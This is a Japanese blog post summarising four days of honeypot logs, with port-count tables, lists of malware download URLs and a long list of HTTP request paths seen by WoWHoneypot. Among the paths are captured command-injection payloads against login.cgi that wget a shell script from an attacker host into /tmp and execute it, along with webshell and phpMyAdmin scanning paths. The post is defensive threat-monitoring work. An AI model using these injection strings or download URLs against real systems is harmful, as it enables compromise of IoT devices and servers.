ハニーポット簡易分析(26-29日目:9/2-9/6)
更新が滞ってしまいましたが、ここ数日分の簡易分析を書きたいと思います。
1.Honeytrap
<宛先ごとにおける検知数>
日付:9/3 件数:3801件 | 日付:9/4 件数:4699件 | ||||
宛先ポート | 件数 | 割合 | 宛先ポート | 件数 | 割合 |
445 | 1,894 | 49.83% | 445 | 2,235 | 45.01% |
3389 | 78 | 2.05% | 1433 | 77 | 1.55% |
52869 | 65 | 1.71% | 5006 | 64 | 1.29% |
1433 | 58 | 1.53% | 37777 | 60 | 1.21% |
81 | 42 | 1.11% | 52869 | 51 | 1.03% |
8080 | 36 | 0.95% | 8080 | 50 | 1.01% |
9944 | 33 | 0.87% | 3389 | 37 | 0.75% |
8088 | 17 | 0.45% | 25 | 33 | 0.66% |
8564 | 15 | 0.40% | 771 | 32 | 0.64% |
5555 | 14 | 0.37% | 5555 | 30 | 0.60% |
日付:9/5 件数:5399件 | 日付:9/6 件数:3971件 | ||||
宛先ポート | 件数 | 割合 | 宛先ポート | 件数 | 割合 |
445 | 2,073 | 38.40% | 445 | 2,115 | 53.26% |
2022 | 475 | 8.80% | 3389 | 76 | 1.91% |
6022 | 64 | 1.19% | 1433 | 72 | 1.81% |
3389 | 61 | 1.13% | 10001 | 64 | 1.61% |
1433 | 60 | 1.11% | 81 | 51 | 1.28% |
81 | 53 | 0.98% | 52869 | 48 | 1.21% |
52869 | 48 | 0.89% | 4899 | 39 | 0.98% |
25 | 37 | 0.69% | 587 | 34 | 0.86% |
8080 | 33 | 0.61% | 8080 | 33 | 0.83% |
8069 | 32 | 0.59% | 4443 | 32 | 0.81% |
日付 | マルウェアダウンロード先 | 検知数 |
9月3日 | hxxp://107[.]191[.]99[.]41/elf[.]mips | 30 |
9月3日 | hxxp://138[.]68[.]21[.]15/oxy[.]mips | 2 |
9月3日 | hxxp://185[.]10[.]68[.]127/rtbin | 4 |
9月3日 | hxxp://207[.]148[.]78[.]152/bc | 4 |
9月3日 | hxxp://27[.]102[.]115[.]44/adbs2 | 9 |
9月3日 | hxxp://77[.]87[.]77[.]250/izuku[.]mips | 14 |
9月3日 | hxxp://95[.]215[.]62[.]169/adbs | 1 |
9月4日 | hxxp://107[.]191[.]99[.]41/elf[.]mips | 9 |
9月4日 | hxxp://138[.]68[.]21[.]15/tenshimips[.]mips | 11 |
9月4日 | hxxp://148[.]72[.]176[.]78/ngynx | 1 |
9月4日 | hxxp://176[.]32[.]33[.]171/kenjiro[.]mips | 1 |
9月4日 | hxxp://77[.]87[.]77[.]250/izuku[.]mips | 11 |
9月4日 | hxxp://80[.]211[.]112[.]150/mips | 1 |
9月4日 | hxxp://80[.]211[.]173[.]159/mips | 2 |
9月5日 | hxxp://107[.]191[.]99[.]41/elf[.]mips | 11 |
9月5日 | hxxp://138[.]68[.]21[.]15/tenshimips[.]mips | 24 |
9月5日 | hxxp://148[.]72[.]176[.]78/ngynx | 1 |
9月5日 | hxxp://27[.]102[.]115[.]44/adbs2 | 2 |
9月5日 | hxxp://77[.]246[.]157[.]180/c | 1 |
9月5日 | hxxp://77[.]87[.]77[.]250/izuku[.]mips | 7 |
9月6日 | hxxp://107[.]191[.]99[.]41/elf[.]mips | 12 |
9月6日 | hxxp://138[.]68[.]21[.]15/tenshimips[.]mips | 5 |
9月6日 | hxxp://185[.]62[.]189[.]149/adbs2 | 2 |
9月6日 | hxxp://207[.]148[.]78[.]152/bc | 1 |
9月6日 | hxxp://27[.]102[.]115[.]44/adbs2 | 4 |
9月6日 | hxxp://77[.]87[.]77[.]250/izuku[.]mips | 14 |
変わらず、IoT系のマルウェアが多いですね。ちょくちょく、パス部分は変わっているので中身が少し変化しているかもしれません。
2.WoWHoneypot
@research.aegis.networkのパスに対して、アクセスが来てました。内容は調査行為でした。
WoWHoneypot マルウェアダウンロード先
http://148.72.176.78/ken.sh |
http://77.87.77.250/izuku.sh |
http://80.211.112.150/k |
http://148.72.176.78/ngynx |
http://77.73.69.246/dl |
WoWHoneypot 検知パス
日付 | メソッド | URLパス |
9月3日 | CONNECT | cn.bing[.]com:443 |
9月3日 | CONNECT | www.baidu[.]com:443 |
9月3日 | GET | / |
9月3日 | GET | /MyAdmin/scripts/setup.php |
9月3日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月3日 | GET | /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ |
9月3日 | GET | /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.112[.]150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ |
9月3日 | GET | /manager/html |
9月3日 | GET | /phpMyAdmin/scripts/setup.php |
9月3日 | GET | /pma/scripts/setup.php |
9月3日 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) |
9月3日 | GET | /web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr |
9月3日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月3日 | GET | hxxp://www.ip.cn/ |
9月3日 | OPTIONS | /C$ |
9月3日 | PROPFIND | /C$ |
9月3日 | PROPFIND | /Users |
9月4日 | GET | / |
9月4日 | GET | /HNAP1/ |
9月4日 | GET | /_query.php |
9月4日 | GET | /appserv.php |
9月4日 | GET | /ccvv |
9月4日 | GET | /cmd.php |
9月4日 | GET | /cmdd.php |
9月4日 | GET | /cmv.php |
9月4日 | GET | /cmx.php |
9月4日 | GET | /db_cts.php |
9月4日 | GET | /db_pma.php |
9月4日 | GET | /desktop.ini.php |
9月4日 | GET | /hell.php |
9月4日 | GET | /help-e.php |
9月4日 | GET | /help.php |
9月4日 | GET | /java.php |
9月4日 | GET | /knal.php |
9月4日 | GET | /lala-dpr.php |
9月4日 | GET | /lala.php |
9月4日 | GET | /license.php |
9月4日 | GET | /log.php |
9月4日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月4日 | GET | /logon.php |
9月4日 | GET | /lol.php |
9月4日 | GET | /muhstik-dpr.php |
9月4日 | GET | /muhstik.php |
9月4日 | GET | /muhstik2.php |
9月4日 | GET | /muhstiks.php |
9月4日 | GET | /pmd_online.php |
9月4日 | GET | /shell.php |
9月4日 | GET | /test.php |
9月4日 | GET | /text.php |
9月4日 | GET | /uploader.php |
9月4日 | GET | /webdav/ |
9月4日 | GET | /wp-config.php |
9月4日 | GET | /wpo.php |
9月4日 | GET | /x.php |
9月4日 | GET | /z.php |
9月4日 | POST | /12.php |
9月4日 | POST | /1213.php |
9月4日 | POST | /3.php |
9月4日 | POST | /56.php |
9月4日 | POST | /9510.php |
9月4日 | POST | /9678.php |
9月4日 | POST | /aaaa.php |
9月4日 | POST | /ak.php |
9月4日 | POST | /ak47.php |
9月4日 | POST | /ak48.php |
9月4日 | POST | /angge.php |
9月4日 | POST | /aotu.php |
9月4日 | POST | /app.php |
9月4日 | POST | /aw.php |
9月4日 | POST | /bak.php |
9月4日 | POST | /cainiao.php |
9月4日 | POST | /ceshi.php |
9月4日 | POST | /cmd.php |
9月4日 | POST | /conflg.php |
9月4日 | POST | /data.php |
9月4日 | POST | /db__.init.php |
9月4日 | POST | /db_dataml.php |
9月4日 | POST | /db_desql.php |
9月4日 | POST | /db_session.init.php |
9月4日 | POST | /default.php |
9月4日 | POST | /defect.php |
9月4日 | POST | /fack.php |
9月4日 | POST | /feixiang.php |
9月4日 | POST | /h1.php |
9月4日 | POST | /help.php |
9月4日 | POST | /hh.php |
9月4日 | POST | /hm.php |
9月4日 | POST | /infoo.php |
9月4日 | POST | /ip.php |
9月4日 | POST | /l7.php |
9月4日 | POST | /l8.php |
9月4日 | POST | /lindex.php |
9月4日 | POST | /linuxse.php |
9月4日 | POST | /log.php |
9月4日 | POST | /m.php?pbid=open |
9月4日 | POST | /min.php |
9月4日 | POST | /mx.php |
9月4日 | POST | /mz.php |
9月4日 | POST | /pe.php |
9月4日 | POST | /phpStudy.php |
9月4日 | POST | /phpinfi.php |
9月4日 | POST | /post.php |
9月4日 | POST | /python.php |
9月4日 | POST | /q.php |
9月4日 | POST | /qaq.php |
9月4日 | POST | /qq.php |
9月4日 | POST | /qwe.php |
9月4日 | POST | /s.php |
9月4日 | POST | /sean.php |
9月4日 | POST | /sheep.php |
9月4日 | POST | /ssaa.php |
9月4日 | POST | /system.php |
9月4日 | POST | /test.php |
9月4日 | POST | /tiandi.php |
9月4日 | POST | /w.php |
9月4日 | POST | /wan.php |
9月4日 | POST | /wanan.php |
9月4日 | POST | /wc.php |
9月4日 | POST | /webslee.php |
9月4日 | POST | /weixiao.php |
9月4日 | POST | /wp-admins.php |
9月4日 | POST | /wshell.php |
9月4日 | POST | /wuwu11.php |
9月4日 | POST | /xiao.php |
9月4日 | POST | /xiaoma.php |
9月4日 | POST | /xiaomae.php |
9月4日 | POST | /xiaomar.php |
9月4日 | POST | /xshell.php |
9月4日 | POST | /xw.php |
9月4日 | POST | /xw1.php |
9月4日 | POST | /xx.php |
9月4日 | POST | /xz.php |
9月4日 | POST | /yao.php |
9月4日 | POST | /yumo.php |
9月4日 | POST | /zshmindex.php |
9月4日 | POST | /zuo.php |
9月4日 | POST | /zuoindex.php |
9月4日 | POST | /zuoshou.php |
9月4日 | PROPFIND | / |
9月5日 | GET | / |
9月5日 | GET | /_query.php |
9月5日 | GET | /admin/assets/js/views/login.js |
9月5日 | GET | /appserv.php |
9月5日 | GET | /cmd.php |
9月5日 | GET | /cmdd.php |
9月5日 | GET | /cmv.php |
9月5日 | GET | /cmx.php |
9月5日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月5日 | GET | /cmx.php?cmd=ec+A:C+D6 |
9月5日 | GET | /db_cts.php |
9月5日 | GET | /db_pma.php |
9月5日 | GET | /desktop.ini.php |
9月5日 | GET | /hell.php |
9月5日 | GET | /help-e.php |
9月5日 | GET | /help.php |
9月5日 | GET | /java.php |
9月5日 | GET | /knal.php |
9月5日 | GET | /lala-dpr.php |
9月5日 | GET | /lala.php |
9月5日 | GET | /license.php |
9月5日 | GET | /log.php |
9月5日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月5日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月5日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月5日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月5日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月5日 | GET | /logon.php |
9月5日 | GET | /lol.php |
9月5日 | GET | /muhstik-dpr.php |
9月5日 | GET | /muhstik.php |
9月5日 | GET | /muhstik2.php |
9月5日 | GET | /muhstiks.php |
9月5日 | GET | /pmd_online.php |
9月5日 | GET | /shell.php |
9月5日 | GET | /test.php |
9月5日 | GET | /text.php |
9月5日 | GET | /uploader.php |
9月5日 | GET | /webdav/ |
9月5日 | GET | /wp-config.php |
9月5日 | GET | /wpo.php |
9月5日 | GET | /x.php |
9月5日 | GET | /z.php |
9月5日 | POST | /12.php |
9月5日 | POST | /1213.php |
9月5日 | POST | /3.php |
9月5日 | POST | /56.php |
9月5日 | POST | /9510.php |
9月5日 | POST | /9678.php |
9月5日 | POST | /aaaa.php |
9月5日 | POST | /ak.php |
9月5日 | POST | /ak47.php |
9月5日 | POST | /ak48.php |
9月5日 | POST | /angge.php |
9月5日 | POST | /aotu.php |
9月5日 | POST | /app.php |
9月5日 | POST | /aw.php |
9月5日 | POST | /bak.php |
9月5日 | POST | /cainiao.php |
9月5日 | POST | /ceshi.php |
9月5日 | POST | /cmd.php |
9月5日 | POST | /cmx.php |
9月5日 | POST | /conflg.php |
9月5日 | POST | /data.php |
9月5日 | POST | /db.init.php |
9月5日 | POST | /db__.init.php |
9月5日 | POST | /db_dataml.php |
9月5日 | POST | /db_desql.php |
9月5日 | POST | /db_session.init.php |
9月5日 | POST | /default.php |
9月5日 | POST | /defect.php |
9月5日 | POST | /fack.php |
9月5日 | POST | /feixiang.php |
9月5日 | POST | /h1.php |
9月5日 | POST | /help.php |
9月5日 | POST | /hh.php |
9月5日 | POST | /hm.php |
9月5日 | POST | /images.php |
9月5日 | POST | /infoo.php |
9月5日 | POST | /ip.php |
9月5日 | POST | /l7.php |
9月5日 | POST | /l8.php |
9月5日 | POST | /lindex.php |
9月5日 | POST | /linuxse.php |
9月5日 | POST | /log.php |
9月5日 | POST | /m.php?pbid=open |
9月5日 | POST | /min.php |
9月5日 | POST | /mx.php |
9月5日 | POST | /mz.php |
9月5日 | POST | /pe.php |
9月5日 | POST | /phpStudy.php |
9月5日 | POST | /phpinfi.php |
9月5日 | POST | /post.php |
9月5日 | POST | /python.php |
9月5日 | POST | /q.php |
9月5日 | POST | /qaq.php |
9月5日 | POST | /qq.php |
9月5日 | POST | /qwe.php |
9月5日 | POST | /s.php |
9月5日 | POST | /sean.php |
9月5日 | POST | /sheep.php |
9月5日 | POST | /ssaa.php |
9月5日 | POST | /system.php |
9月5日 | POST | /test.php |
9月5日 | POST | /tiandi.php |
9月5日 | POST | /w.php |
9月5日 | POST | /wan.php |
9月5日 | POST | /wanan.php |
9月5日 | POST | /wc.php |
9月5日 | POST | /webslee.php |
9月5日 | POST | /weixiao.php |
9月5日 | POST | /wp-admins.php |
9月5日 | POST | /wshell.php |
9月5日 | POST | /wuwu11.php |
9月5日 | POST | /xiao.php |
9月5日 | POST | /xiaoma.php |
9月5日 | POST | /xiaomae.php |
9月5日 | POST | /xiaomar.php |
9月5日 | POST | /xshell.php |
9月5日 | POST | /xw.php |
9月5日 | POST | /xw1.php |
9月5日 | POST | /xx.php |
9月5日 | POST | /xz.php |
9月5日 | POST | /yao.php |
9月5日 | POST | /yumo.php |
9月5日 | POST | /zshmindex.php |
9月5日 | POST | /zuo.php |
9月5日 | POST | /zuoindex.php |
9月5日 | POST | /zuoshou.php |
9月5日 | PROPFIND | / |
9月6日 | GET | / |
9月6日 | GET | /1AS/index.jsp |
9月6日 | GET | /1q/index.jsp |
9月6日 | GET | /2323633/index.jsp |
9月6日 | GET | /51/index.jsp |
9月6日 | GET | /511/index.jsp |
9月6日 | GET | /5211111111111/index.jsp |
9月6日 | GET | /AAAAAAAAAAAAAAAAAAAAuper/index.jsp |
9月6日 | GET | /Anzzpo/index.jsp |
9月6日 | GET | /Aqwe/index.jsp |
9月6日 | GET | /CluJaNul/index.jsp |
9月6日 | GET | /EWFQ/index.jsp |
9月6日 | GET | /FA/index.jsp |
9月6日 | GET | /Fendou/index.jsp |
9月6日 | GET | /Fido/index.jsp |
9月6日 | GET | /JSP/index.jsp |
9月6日 | GET | /JuLiAn/index.jsp |
9月6日 | GET | /Liutao/index.jsp |
9月6日 | GET | /Memory/index.jsp |
9月6日 | GET | /Micrsyse2m/index.jsp |
9月6日 | GET | /MyAdmin/scripts/setup.php |
9月6日 | GET | /Mytomcat/index.jsp |
9月6日 | GET | /PMA/index.php |
9月6日 | GET | /PMA2/index.php |
9月6日 | GET | /QQ374666283/index.jsp |
9月6日 | GET | /QQ443076142/index.jsp |
9月6日 | GET | /QQ563332298AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/index.jsp |
9月6日 | GET | /QQ727095531/index.jsp |
9月6日 | GET | /QQPP/index.jsp |
9月6日 | GET | /SQLL/index.jsp |
9月6日 | GET | /Tomcatmansagxesaasxsas/index.jsp |
9月6日 | GET | /Xs/index.jsp |
9月6日 | GET | /_query.php |
9月6日 | GET | /admin/PMA/index.php |
9月6日 | GET | /admin/assets/js/views/login.js |
9月6日 | GET | /admin/index.php |
9月6日 | GET | /admin/mysql/index.php |
9月6日 | GET | /admin/mysql2/index.php |
9月6日 | GET | /admin/phpMyAdmin/index.php |
9月6日 | GET | /admin/phpmyadmin2/index.php |
9月6日 | GET | /ak/index.jsp |
9月6日 | GET | /apach/index.jsp |
9月6日 | GET | /apache-tomcat/index.jsp |
9月6日 | GET | /apache-web/index.jsp |
9月6日 | GET | /appserv.php |
9月6日 | GET | /apptor/index.jsp |
9月6日 | GET | /asd/index.jsp |
9月6日 | GET | /black/index.jsp |
9月6日 | GET | /chaochao/index.jsp |
9月6日 | GET | /china/index.jsp |
9月6日 | GET | /chuan/index.jsp |
9月6日 | GET | /claroline/phpMyAdmin/index.php |
9月6日 | GET | /cmd.php |
9月6日 | GET | /cmd/index.jsp |
9月6日 | GET | /cmd2/index.jsp |
9月6日 | GET | /cmdd.php |
9月6日 | GET | /cmv.php |
9月6日 | GET | /cmx.php |
9月6日 | GET | /cwx/index.jsp |
9月6日 | GET | /dan/index.jsp |
9月6日 | GET | /db/index.php |
9月6日 | GET | /db_cts.php |
9月6日 | GET | /db_pma.php |
9月6日 | GET | /dbadmin/index.php |
9月6日 | GET | /desktop.ini.php |
9月6日 | GET | /dingfan/index.jsp |
9月6日 | GET | /dream/index.jsp |
9月6日 | GET | /emperor/index.jsp |
9月6日 | GET | /emperor3/index.jsp |
9月6日 | GET | /f4ck/index.jsp |
9月6日 | GET | /feng/index.jsp |
9月6日 | GET | /fuckxue/index.jsp |
9月6日 | GET | /goc-vpn/index.jsp |
9月6日 | GET | /gxjsp/index.jsp |
9月6日 | GET | /hacks/index.jsp |
9月6日 | GET | /hcskk/index.jsp |
9月6日 | GET | /hell.php |
9月6日 | GET | /help-e.php |
9月6日 | GET | /help.php |
9月6日 | GET | /host-mana/index.jsp |
9月6日 | GET | /ht/index.jsp |
9月6日 | GET | /hua/index.jsp |
9月6日 | GET | /iesvc/index.jsp |
9月6日 | GET | /index.php |
9月6日 | GET | /java.php |
9月6日 | GET | /javi/index.jsp |
9月6日 | GET | /javi100/index.jsp |
9月6日 | GET | /jc/index.jsp |
9月6日 | GET | /jo3/index.jsp |
9月6日 | GET | /king/index.jsp |
9月6日 | GET | /knal.php |
9月6日 | GET | /koko/index.jsp |
9月6日 | GET | /lala-dpr.php |
9月6日 | GET | /lala.php |
9月6日 | GET | /license.php |
9月6日 | GET | /lincogo/index.jsp |
9月6日 | GET | /log.php |
9月6日 | GET | /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ |
9月6日 | GET | /logon.php |
9月6日 | GET | /lol.php |
9月6日 | GET | /looky/index.jsp |
9月6日 | GET | /manager/html |
9月6日 | GET | /maque6695940/index.jsp |
9月6日 | GET | /maque66959401/index.jsp |
9月6日 | GET | /memimi/index.jsp |
9月6日 | GET | /muhstik-dpr.php |
9月6日 | GET | /muhstik.php |
9月6日 | GET | /muhstik2.php |
9月6日 | GET | /muhstiks.php |
9月6日 | GET | /myadmin/index.php |
9月6日 | GET | /myadmin2/index.php |
9月6日 | GET | /mysql-admin/index.php |
9月6日 | GET | /mysql/index.php |
9月6日 | GET | /mysql/scripts/setup.php |
9月6日 | GET | /mysqladmin/index.php |
9月6日 | GET | /mysqladmin/scripts/setup.php |
9月6日 | GET | /mzy/index.jsp |
9月6日 | GET | /osu/index.jsp |
9月6日 | GET | /phpMyAdmin.old/index.php |
9月6日 | GET | /phpMyAdmin/index.php |
9月6日 | GET | /phpMyAdmin/phpMyAdmin/index.php |
9月6日 | GET | /phpMyAdmin/scripts/setup.php |
9月6日 | GET | /phpMyAdminold/index.php |
9月6日 | GET | /phpMyadmin_bak/index.php |
9月6日 | GET | /phpadmin/index.php |
9月6日 | GET | /phpma/index.php |
9月6日 | GET | /phpmyadmin-old/index.php |
9月6日 | GET | /phpmyadmin0/index.php |
9月6日 | GET | /phpmyadmin1/index.php |
9月6日 | GET | /phpmyadmin2/index.php |
9月6日 | GET | /piaomiao111/index.jsp |
9月6日 | GET | /pma-old/index.php |
9月6日 | GET | /pma/scripts/setup.php |
9月6日 | GET | /pmamy/index.php |
9月6日 | GET | /pmamy2/index.php |
9月6日 | GET | /pmd/index.php |
9月6日 | GET | /pmd_online.php |
9月6日 | GET | /private/index.jsp |
9月6日 | GET | /qidai/index.jsp |
9月6日 | GET | /qjhq/index.jsp |
9月6日 | GET | /rf/index.jsp |
9月6日 | GET | /rrr/index.jsp |
9月6日 | GET | /rte/index.jsp |
9月6日 | GET | /safe/index.jsp |
9月6日 | GET | /safe2/index.jsp |
9月6日 | GET | /safee/index.jsp |
9月6日 | GET | /safepp/index.jsp |
9月6日 | GET | /scripts/setup.php |
9月6日 | GET | /servletc-eavmple/index.jsp |
9月6日 | GET | /shell.php |
9月6日 | GET | /shijian/index.jsp |
9月6日 | GET | /shl/index.jsp |
9月6日 | GET | /soft/index.jsp |
9月6日 | GET | /supsz/index.jsp |
9月6日 | GET | /synsuper/index.jsp |
9月6日 | GET | /synsupesssssssssssssssr/index.jsp |
9月6日 | GET | /sysadmin/index.jsp |
9月6日 | GET | /system/index.jsp |
9月6日 | GET | /system2/index.jsp |
9月6日 | GET | /systems/index.jsp |
9月6日 | GET | /tao/index.jsp |
9月6日 | GET | /taoge/index.jsp |
9月6日 | GET | /temps/index.jsp |
9月6日 | GET | /test.php |
9月6日 | GET | /text.php |
9月6日 | GET | /tomcat-5.5.26/index.jsp |
9月6日 | GET | /tools/phpMyAdmin/index.php |
9月6日 | GET | /typo3/phpmyadmin/index.php |
9月6日 | GET | /uploader.php |
9月6日 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) |
9月6日 | GET | /wangbaba110/index.jsp |
9月6日 | GET | /wavce/index.jsp |
9月6日 | GET | /web/phpMyAdmin/index.php |
9月6日 | GET | /webd/index.jsp |
9月6日 | GET | /webdav/ |
9月6日 | GET | /webdax/index.jsp |
9月6日 | GET | /webdoc/index.jsp |
9月6日 | GET | /webex/index.jsp |
9月6日 | GET | /webshell/index.jsp |
9月6日 | GET | /wholove/index.jsp |
9月6日 | GET | /win/index.jsp |
9月6日 | GET | /win88/index.jsp |
9月6日 | GET | /wo/index.jsp |
9月6日 | GET | /wp-config.php |
9月6日 | GET | /wpo.php |
9月6日 | GET | /ww/index.jsp |
9月6日 | GET | /www/phpMyAdmin/index.php |
9月6日 | GET | /x.php |
9月6日 | GET | /xampp/phpmyadmin/index.php |
9月6日 | GET | /xhzz/index.jsp |
9月6日 | GET | /xiaodama/index.jsp |
9月6日 | GET | /xiaohui/index.jsp |
9月6日 | GET | /xiaomo/index.jsp |
9月6日 | GET | /xiaon/index.jsp |
9月6日 | GET | /xiaowu/index.jsp |
9月6日 | GET | /xiaozhe/index.jsp |
9月6日 | GET | /xinsui/index.jsp |
9月6日 | GET | /z.php |
9月6日 | GET | /zhu/index.jsp |
9月6日 | GET | /zman/index.jsp |
9月6日 | GET | /zxc/index.jsp |
9月6日 | GET | @research.aegis.network/ |
9月6日 | HEAD | hxxp://180.163.113[.]82/check_proxy |
9月6日 | OPTIONS | * |
9月6日 | POST | /12.php |
9月6日 | POST | /1213.php |
9月6日 | POST | /3.php |
9月6日 | POST | /56.php |
9月6日 | POST | /9510.php |
9月6日 | POST | /9678.php |
9月6日 | POST | /aaaa.php |
9月6日 | POST | /ak.php |
9月6日 | POST | /ak47.php |
9月6日 | POST | /ak48.php |
9月6日 | POST | /angge.php |
9月6日 | POST | /aotu.php |
9月6日 | POST | /app.php |
9月6日 | POST | /aw.php |
9月6日 | POST | /bak.php |
9月6日 | POST | /boots.php |
9月6日 | POST | /cainiao.php |
9月6日 | POST | /ceshi.php |
9月6日 | POST | /cmd.php |
9月6日 | POST | /conflg.php |
9月6日 | POST | /data.php |
9月6日 | POST | /db.init.php |
9月6日 | POST | /db__.init.php |
9月6日 | POST | /db_dataml.php |
9月6日 | POST | /db_desql.php |
9月6日 | POST | /db_session.init.php |
9月6日 | POST | /default.php |
9月6日 | POST | /defect.php |
9月6日 | POST | /fack.php |
9月6日 | POST | /feixiang.php |
9月6日 | POST | /h1.php |
9月6日 | POST | /help.php |
9月6日 | POST | /hh.php |
9月6日 | POST | /hm.php |
9月6日 | POST | /infoo.php |
9月6日 | POST | /ip.php |
9月6日 | POST | /l6.php |
9月6日 | POST | /l7.php |
9月6日 | POST | /l8.php |
9月6日 | POST | /lindex.php |
9月6日 | POST | /linuxse.php |
9月6日 | POST | /log.php |
9月6日 | POST | /m.php?pbid=open |
9月6日 | POST | /miao.php |
9月6日 | POST | /min.php |
9月6日 | POST | /mx.php |
9月6日 | POST | /mz.php |
9月6日 | POST | /pe.php |
9月6日 | POST | /phpStudy.php |
9月6日 | POST | /phpinfi.php |
9月6日 | POST | /post.php |
9月6日 | POST | /python.php |
9月6日 | POST | /q.php |
9月6日 | POST | /qaq.php |
9月6日 | POST | /qq.php |
9月6日 | POST | /qwe.php |
9月6日 | POST | /s.php |
9月6日 | POST | /sean.php |
9月6日 | POST | /she.php |
9月6日 | POST | /sheep.php |
9月6日 | POST | /ssaa.php |
9月6日 | POST | /system.php |
9月6日 | POST | /test.php |
9月6日 | POST | /tiandi.php |
9月6日 | POST | /w.php |
9月6日 | POST | /wan.php |
9月6日 | POST | /wanan.php |
9月6日 | POST | /wc.php |
9月6日 | POST | /webslee.php |
9月6日 | POST | /weixiao.php |
9月6日 | POST | /wp-admins.php |
9月6日 | POST | /wshell.php |
9月6日 | POST | /wuwu11.php |
9月6日 | POST | /xiao.php |
9月6日 | POST | /xiaoma.php |
9月6日 | POST | /xiaomae.php |
9月6日 | POST | /xiaomar.php |
9月6日 | POST | /xshell.php |
9月6日 | POST | /xw.php |
9月6日 | POST | /xw1.php |
9月6日 | POST | /xx.php |
9月6日 | POST | /xz.php |
9月6日 | POST | /yao.php |
9月6日 | POST | /yumo.php |
9月6日 | POST | /zshmindex.php |
9月6日 | POST | /zuo.php |
9月6日 | POST | /zuoindex.php |
9月6日 | POST | /zuoshou.php |
9月6日 | PROPFIND | / |
以上、簡易分析でした。